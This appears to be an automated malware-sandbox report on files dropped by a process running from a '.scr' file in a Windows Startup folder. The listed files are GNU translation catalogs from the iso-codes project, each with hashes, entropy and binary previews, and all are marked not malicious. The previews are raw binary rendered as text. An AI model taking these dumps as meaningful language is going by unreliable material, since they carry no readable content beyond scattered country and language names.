                                                                                                    Preview:........................\...............................................................................................................%.......,.......8.......D.......P.......V.......e.......s.......K.......T.......\.......a.......j.......q.......|........................................................................................................................................................................................................................Belarus.Canada.China.Denmark.France.Germany.Greece.India.Ireland.Israel.Italy.Japan.Mexico.Netherlands.New Zealand.Philippines.Spain.United Kingdom.United States.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 21:47+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Hawaiian <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/haw/>.Language: haw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Conte
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):395
                                                                                                    Entropy (8bit):5.2089211953991335
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijkYYxA9Ct0vOuvP0NXzffUWKcG/R1iMA2KMiRlF2AF15jXmBQ8KMW0YEi9:i4kxxjt02UkLKcG/Ki4FL1JXmBQWi9
                                                                                                    MD5:3E376888E8F4F58FBC8697AE9C7141D8
                                                                                                    SHA1:45A9EFEA68629B92D4F105910789C63AF63260B4
                                                                                                    SHA-256:1CAD6C0EC1225CD03F34AE97A94B5728D45F3FE75FC23631F561D41CA2C123A0
                                                                                                    SHA-512:6AA5AFEC85EA7BC4D74C8A80341178D8C28D2B2A14BB7FE4198B193B919A6771BC399B6EED148D846DCA9600BA8A29A6BE0D8FBC731BC11F538B6D7C2B012CD4
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...Q...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Hawaiian.Language: haw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 58 messages, Project-Id-Version: iso_15924 '\327\220\327\223\327\234\327\235'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3410
                                                                                                    Entropy (8bit):5.105418408536275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jqP3Is5KGAJgu0CqWcosRlw1Hgx1OqYF717Sqs:jqP4wKGyUCqWzszpx1OtF9bs
                                                                                                    MD5:444DA0855268F8DA228805F3EFA6EA98
                                                                                                    SHA1:CD5142705F8BD9F452109997DDAD94F2EC5DCDB0
                                                                                                    SHA-256:FF7365933AF42E22C32A47B44F40AC5DB82CF71E4DD1E24E42C72A6D81F7DC6F
                                                                                                    SHA-512:C7A71F31C3496DEC7E22E682CE264C95CB2F9ECDDBF192949BED9194A33E678E30850D58649F1E5380920E89305EA7B96079A18505227CDE09092539ECB21FF5
                                                                                                    Malicious:false
                                                                                                    Preview:........:...........O...................................................&......./.......7.......@.......H.......Q.......X.......`.......s.......|...............................................................................................!.......(......./.......8.......I.......R.......Z.......`.......t.......x.......~...............................................................................................................1.......7.......>.......E.......J.......R.......[......._.......n.......x...................&...................................................................!.......=...)...L...'...v...............................................................................(.......B.......O.......Z.......k.......................................................................................3.......>.......G.......T.......j.......y...........(...............-...................................................&.......7.......>...............!...(...........%...9...$.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: he '\327\220\327\244\327\222\327\240\327\231\327\241\327\230\327\237'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27802
                                                                                                    Entropy (8bit):5.022416936526857
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oObyD48fmsWP48WAI2SM6sE6Ipv03XpY2:bq+48LuDICY2
                                                                                                    MD5:8E82A2B5AD2088552D2330C468AAC40F
                                                                                                    SHA1:8068965BA8F11DEBAF68A895B3B8253910E0E5C8
                                                                                                    SHA-256:E6FEBF3584B5AB7B3947DFA3B280FF5550A24691409FC0AF00BFC520A71CA0AF
                                                                                                    SHA-512:5C07174EF8DFEA284724858A1A3FB95C212B90F1706292760768C558A74AB15C67E1A8B5882351FAD084AE2A2E614696F64934A606B91B6E3DDDBA74171A77EA
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 908 messages, Project-Id-Version: iso_3166-2 '\327\220\327\263\327\220\327\240\327\224'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43708
                                                                                                    Entropy (8bit):4.99163637231343
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0imLyOC/8mXBWGgd0dh36NhKCGeA9zqrCz1hP17+fsEDSObcRZ:rmLyH0s36NhKCqQCr9qBncz
                                                                                                    MD5:EEECB76C78F32B4414B5FA0337AB8736
                                                                                                    SHA1:7ED6A8065AA611462F9776A6BDC4584996626811
                                                                                                    SHA-256:7739B4BF73675D279CB967B1C77A16D7E3CA8362D79C9320C1A5A67EA93124F9
                                                                                                    SHA-512:CFB5243DEB67584B49D267A696A5E7C92599EC5E2137F85C595E1C6E20E357E0DA3D62967CA1F787E21BFC2E54EA05189B81EFFC526C0A0732379524EDC80896
                                                                                                    Malicious:false
                                                                                                    Preview:................|........8.......K.......K.......K.......K.......K.......K.......L.......L.......L......$L......2L......8L......BL......QL......]L......hL......tL.......L.......L.......L.......L.......L.......L.......L.......L.......L.......M.......M.......M......#M......-M......7M......?M......IM......VM......`M......oM......}M.......M.......M.......M.......M.......M.......M.......M.......M.......M.......N.......N.......N.......N......%N......)N......8N......AN......]N......eN......vN.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O.......O...... O.......O......?O......NO......\O......rO......yO.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......P.......P.......P.......P......(P......3P......9P......FP......NP......VP......_P......jP......qP......yP.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: he '\327\224\327\230\327\250\327\231\327\230\327\225\327\250\327\231\327\224 \327\224\327\221\327\250\327\231\327\230\327\231\327\252 \327\221\327\220\327\240\327\230\327\250\327\247\327\230\327\231\327\247\327\224'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3369
                                                                                                    Entropy (8bit):5.281944887983712
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3WsSaGI+vGqIfdvqN5CRUs8wtLHgixsMS2CdzgxpByObgYR6S:rLvWsSaN+yaCRwG3ST2CdzgxpBtp1
                                                                                                    MD5:D646DEEDD2E9C977EF19143037EDFBAE
                                                                                                    SHA1:9742619212D76CB800EB2E283F18293163DF37B9
                                                                                                    SHA-256:17E3923E98FB9E2B63168F26247AC93FAD4A6774093D8CA5BAC0A969DF3F7BF8
                                                                                                    SHA-512:9E0A19F057F735F57E72750E42C7BCD20114FA1BD26A186CB46313FC8CDCB26646CC720A551C73E83F1C39F30D62B9212FF861BA412E0913DA2040F00893ACD2
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................6.......N...(...l...w...(.......Z...........h.......u...................).......H.......4...2..."...g...........................................1...........=.......X.......v...........>...............0.......:...%.......`...@...p...U.......!............... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 122 messages, Project-Id-Version: iso_639-3 '\327\220\327\221\327\227\327\226\327\231\327\252'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5910
                                                                                                    Entropy (8bit):4.802454858969696
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oVwnznBk621rAcSwsRVCaxFAP4ka0lDV1AMvF+l2CnINlqB3n3pNR6tVmLs7lb:8KnBBOjSCKAPXl51NvYcAtn3pNRCELWb
                                                                                                    MD5:6F9390BC5AF9841DD76CDB00C2597BB8
                                                                                                    SHA1:0D44DE490A66BCD909A6008E587440FD73A9F1A3
                                                                                                    SHA-256:36E0893886BE16A27F150B83599FDAB8586ED3AB123A1598B1AE4EBABDC1FF91
                                                                                                    SHA-512:68B758F933095F89961655345F8DC0D7B42EADCD7970C212D2E0B27BFB0F74595E9EE2AFB922F850CC1F5A9C67EBA391AE11EC8913D05760A7B5859E3A49B507
                                                                                                    Malicious:false
                                                                                                    Preview:........z.......................H.......I.......S.......X.......b.......j.......r...............................................................................................................................................................$.......-.......6.......<.......C.......L.......R.......b.......g.......q.......z...............................................................................................................................................................(.......5.......C.......J.......R.......Y.......^.......d.......l.......w...............................................................................................................................................................$.......+.......6.......?.......G.......O.......W.......^.......h.......p.......x.......~...............................................................................................................................................................-.......3.......9.......A.......H.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\274\340\245\215\340\244\227\340\244\276\340\244\250\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35310
                                                                                                    Entropy (8bit):5.008835815622387
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRgbL2nFyzmwZbjh5wsWP4XWAIziUGHsBGFPpY7897x78cuAppHrBkd:sxDnFyzmotmsWP4XWAIDBkpBdPH7y
                                                                                                    MD5:1B5213EDEE105DD96104FED7C5B53702
                                                                                                    SHA1:3EC923AF7CFE5DEA5C9FF31B23ECBADB3F0EE552
                                                                                                    SHA-256:43DE40CA598C7C0349006BF4761A2F72CD2BEA5C635AC8508686B423FB78C44F
                                                                                                    SHA-512:80F67D44DAAC7CB849FC60DC1A2CA4DE79A1B279BB4B72842281D7EEF31B1C20A8C6A3523C0D8C8DC2070D38112BC9B2A9F26BAB467DFE96769157C2EA22D592
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\244\254\340\245\215\340\244\260\340\244\277\340\244\237\340\244\277\340\244\266 \340\244\217\340\244\243\340\245\215\340\244\237\340\244\276\340\244\260\340\245\215\340\244\225\340\244\237\340\244\277\340\244\225 \340\244\237\340\245\207\340\244\260\340\245\200\340\244\237\340\244\260\340\245\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3973
                                                                                                    Entropy (8bit):5.228120110262127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADHlByvGqIfdvqNuoUzpW/mub7l2kxL8fzIO1dgJxkbSHl8nPT:qDyyBo2WLB9xL8b964eHl8nPT
                                                                                                    MD5:C03461094B65C1D4DDD191E17C4B1E44
                                                                                                    SHA1:8F53CBBAFA9188A8C9A24CEED1678A24EA437782
                                                                                                    SHA-256:A457757001F2456CF0929FD0860492880573EE9FC2460BC2CDBADC25B8CCF34E
                                                                                                    SHA-512:5355801EC2A02F6E2DA9D387A607465511F173AF367B1B3EF58D5CB3761879DC418EF4BB5ABEA23E56ADCA1D9E94CB97028DF41CB931B4B0020836A042B40D75
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................M...|...m.......|...8...K......................./...............8.......B.......p...`...J.......N.......(...k...(.......7.......%.......(...........D.../...s...Q...............(.......W...4...q.......C.......[...B...&...............9...K........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 123 messages, Project-Id-Version: iso_639-3 '\340\244\205\340\244\254\340\245\215\340\244\226\340\244\276\340\245\233\340\244\277\340\244\257\340\244\250\340\245\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6805
                                                                                                    Entropy (8bit):4.89846768619138
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:W5s4/ydltswrAT80l3D3bpte5M5+9IRf3cSCtl3MFxiXmyS+e1:W59Kdlur80lT3/eqG3Mi1e1
                                                                                                    MD5:3E5F21DE1BFEDD6F802F37151D6D7A9C
                                                                                                    SHA1:052D55FD2C1AC1771126F9EB2AA4B3FF16527353
                                                                                                    SHA-256:96E316DBEE8FA77B13BC1F5BB8E077E140C8D7959987484280F7DC6D9D7EC017
                                                                                                    SHA-512:0BFCD5C3B0EC1D886688F17F403306C36D56144418D2C67CCD253C4ED6AC5E1FA85E3505A72FB938637445811CEBD3153B8075394783F8C4333B30E42ED0C16A
                                                                                                    Malicious:false
                                                                                                    Preview:........{.......................h.......i.......s.......x...............................................................................................................................................................".......+.......4.......:.......A.......G.......P.......X.......b.......k.......s.......z...............................................................................................................................................................!.......).......2.......9.......E.......M.......T.......\.......`.......f.......n.......v............................................................................................................................................................... .......&......./.......7.......=.......D.......K.......U.......\.......l.......v.......|.......................................................................................................................................................................!.......'.......-.......3.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_639-5 '\340\244\221\340\244\270\340\245\215\340\244\237\340\245\215\340\244\260\340\245\213-\340\244\217\340\244\266\340\244\277\340\244\257\340\244\276\340\244\210 \340\244\255\340\244\276\340\244\267\340\244\276\340\244\217\340\244\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):632
                                                                                                    Entropy (8bit):5.501823752498222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iLsl/S119Xxq8t02UkIV/M8nPLLG/4l5ZiXmBQWiOWYJ:ZuXTt0UmMp/FXmGU
                                                                                                    MD5:AF1BFADB62A52DD5AE3772943D5D4EF2
                                                                                                    SHA1:7DD3A62FE92C319BF5C0780B3FF575A53E1D28C4
                                                                                                    SHA-256:4535072887318484B2A890AA19F532B1F41ADA6DA7218C26900FDCECF7370DF3
                                                                                                    SHA-512:82698EA49C2A099DE6DC80531C3B505515BB92903D51646235B91336693410527142E6C930AAC06676F069C4FB68187E79675C14B52CC17424650EFF2DE2B29A
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......j...;...<........................Austro-Asiatic languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-11-12 17:51+0000.Last-Translator: KushagraKarira <kushagrakarira@gmail.com>.Language-Team: Hindi <https://hosted.weblate.org/projects/iso-codes/iso-639-5/hi/>.Language: hi.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.9.1-dev.........-...... .......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlamsko'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10432
                                                                                                    Entropy (8bit):5.117643600523515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:d28MebbltU4WjV9qWxa5hW85zWCUHLtuhu62:mebbg4WjVDxa5hW85zWxhuhup
                                                                                                    MD5:89E9D86BD3CFA0C0981B6C844C8DA87C
                                                                                                    SHA1:F18B7FC6635E2DDEFAAE6BD857B44967CD1C50C9
                                                                                                    SHA-256:BEE1CEE5651C612B2CFB9DEA6B83EEE31B9128CB328599C86C0B5BBA51345F64
                                                                                                    SHA-512:2DCFC64404D8DEF2B55E4E53E4D300B0A0561D4834BC1DFB16D87273367AE90F4BF2613C64238BFA4777FC32DE7879E5AD99B6FE6999E09597B4316561D01AE5
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 423 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23488
                                                                                                    Entropy (8bit):5.050246294829439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:taDYOckDRul+cYRmMvXMMDpQqYbEbjh5wsWP4XWAINiVGBOzjfqLENmQwjcQjXk7:naDcYBvXMspMbgtmsWP4XWAIjwiLqGQL
                                                                                                    MD5:91393E120BCFEFD2180FD86233CDDC3F
                                                                                                    SHA1:65217A85EEB36398E1D5F719A237AE9F13A206A3
                                                                                                    SHA-256:45D85E9BC1E758AB091397AF1DCC5A8D9D3F35D5572215DE71167ABE52F07B74
                                                                                                    SHA-512:AC84A787F8801A11E158D55C34CA3F080E006F70F37FFD128A0CBAD6E1108ACB3E57A4AFBF482759C32893C55A03689F87A3C2ED01D9519E25CF99B373E02381
                                                                                                    Malicious:false
                                                                                                    Preview:................T...9...........p#......q#......}#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......'$......2$......:$......B$......M$......V$......^$......f$......m$......s$......{$.. ....$.......$.......$.. ....$.......$.......%.......%.......%......!%......@%......W%......i%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&..,...K&......x&.......&..%....&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....'..,...-'.."...Z'..*...}'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......%(......-(......6(......?(......[(..'...i(..$....(.......(.......(.......(.......)......))......G)......L)......T)......[)......i)......z).......).......).......).......).......).......).......).......).......).......).......*.......*.......*......#*......(*......2*......;*......B*......P*......W*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 538 messages, Project-Id-Version: iso_3166-2 'Teritorij glavnog grada Abuja'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25948
                                                                                                    Entropy (8bit):5.022028067098029
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:kVt/3I0R3SBKFGFqOap9JymQ+Uay8ud28tLBblpIWZDnvu5zhku9S2joELpCVpBJ:23XR3FGFqXhuVtVbfIWpWht9lDVWpBJ
                                                                                                    MD5:355B683684BA77DF7E75353C6FAE8DE6
                                                                                                    SHA1:99A7EF3BE3147B5E78ABA7B5CE2C9BAC9BDB8ED5
                                                                                                    SHA-256:7887E9EB3EE7AEDFEF75289F974AF021CEC20548490875768B0339C8D32E7983
                                                                                                    SHA-512:087A06A8F673C15243C030E396D0AC48AAE9BCC0CD20500A6740EDFE19E7E12624F539FDEE39C22FD96F5F4D6EB194EBF6CE1BC5A8F2A5A290C8942E4F88274C
                                                                                                    Malicious:false
                                                                                                    Preview:.........................!.......,.......,.......-......&-......2-......A-......M-......e-......o-......v-.......-.......-..$....-.......-.......-.......-.......-......................$.......(.......=.......Z.......a.......h.......q.......z................................................... ............................................/......./......./......"/......,/......9/......B/......H/......W/......c/......v/......./......./......./......./......./......./......./......./......./......./......./......./.......0.......0.......0......'0....../0......H0......N0......[0......j0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......1.......1......%1.......1......61......?1......E1......P1......W1......m1......t1.......1.......1.......1.......1.......1.......1..!....1.......1.......1.......2.......2.......2....../2......<2......N2......Z2......m2......u2......}2.......2.......2.......2.......2.......2.......2.......2.......2.......2......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britanski Antarkti\304\215ki Teritorij'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2755
                                                                                                    Entropy (8bit):5.29565920708035
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADKgJnkvGqIfdvqNuoU2YrJD7nqoOoaLAXCGFyZyoMoB:qDRJkyBo1Yrtq0EAXfJ7S
                                                                                                    MD5:7D365E25B00BDE0806347017DA8ADCA2
                                                                                                    SHA1:EAC8A50A77EF34C0CD0EE934BCF76CEB390321C3
                                                                                                    SHA-256:5FE44DBF0BA33E83718E6E724634C20D61988A4BE03CF5BFDECA16C373C045A3
                                                                                                    SHA-512:1B72CA8DED814C98BEA47ADA44653B0601CC879A63D2BE8EAE574FE5185F8A408871355E2904CB055CB5D88D5FC9F4241E910B22C9C687A9E3377AFF7D975730
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c................... .......%.......2...........6...8...O...........................................*...................-.......D.......R.......a.......s...........)....................................... .......1...........L.......c...........1....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB obra\304\215unska jedinica'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10437
                                                                                                    Entropy (8bit):5.035242680879582
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFwUnQZpZDCNpZ6VRyK0G/2LCntxpt++tNb+Xr5uOnh1i1TwNgkcZQ:SDQZpZ2NpZ6TL0G/Uo/ptRSr5x1mwekr
                                                                                                    MD5:EA8B4739CD3984ADD8CA6C0B3D898B94
                                                                                                    SHA1:667EF33AD9237709F689D18573082328CA0160FF
                                                                                                    SHA-256:2CA926A1DBE5A7F753A3DDE6342B0BFDF349FDA58C4AB6E428409ED9EA3BAAEF
                                                                                                    SHA-512:69549DF0E5C5FF8D33396C73E4FAB6F48CA103F19AE776A7ED74C53D3A2CDE692178E784511FA4D3F6A71C611260AD162FFB648A21DBD347460DF3E1B2445C93
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 938 messages, Project-Id-Version: iso_639-3 'Aas\303\241x'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):52545
                                                                                                    Entropy (8bit):5.175947386596788
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ugBu8Lv4bAPjsBt/E4yOMgv5Zp4pHkZcHabN0OkSnRFdqm5vu/IiPed:umWaLwkk2HON0OtJqUnVd
                                                                                                    MD5:87C6BC9E741E01C821F8F6D5561CF6A1
                                                                                                    SHA1:AD2FD48C1D0FC50D10B611A1225D43DCBAB2D6BD
                                                                                                    SHA-256:42D02B1329FB01D2B09B27BA568368D3E74745C42EA146AAC5A92A1AA02B6A7A
                                                                                                    SHA-512:04E8CF13E60FC0EF664554D82A82FBCD300F4BD2EBC6762110A47A688F4EFB15E8C16E192BA44380271EE9DB95E41ABB24E4694BDF1A9635BB4201A0F3A6D615
                                                                                                    Malicious:false
                                                                                                    Preview:................l........:......hN......iN......pN......vN.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O......+O......2O......8O......=O......RO......\O......qO......~O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......P.......P.......P......3P......JP......_P......iP......nP......}P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q.......Q......)Q......@Q......HQ......PQ......hQ......wQ.......Q.......Q.......Q.......Q.......Q.."....Q.......Q.......R.......R.......R......,R......ER......XR......hR......xR.......R.......R.......R.......R.......R.......R.......R.......S...... S......5S......DS......YS......jS......xS.......S.......S.......S.......S.......S.......S.......T.......T......'T......6T......GT......VT..,...`T.......T.......T.......T.......T.......T.......U.......U......'U......<U......BU......ZU......^U......oU......xU......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afroazijski jezici'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7671
                                                                                                    Entropy (8bit):4.954004119420387
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx4+ENedRSE0BfNcaT4Pg0uHFGiDlJMSI3ep3yzY0vLy45k5TpB3v1R51cSaUC:XK+FdME0BfNcaTCg0uHFqSI3ep3yzY0z
                                                                                                    MD5:72B9E60644F43A48CE142A0347E0C00A
                                                                                                    SHA1:F26A0144DBBF5A3AA7970B6136BA1CF33E9B6123
                                                                                                    SHA-256:7B81E2819A22C9B447028094D16E5FBC8130705C1795CE929221CC50351FB6E0
                                                                                                    SHA-512:F90E0AD9ECFDC4C70FF59465FE145F6079A034CF34B28079FCC077C391CBFFD2968665DFC3A0E8D92C6ECF8D0DC2D98F9BC638925D955177BA12938809752704
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................%.......8.......M.......].......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 187 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7744
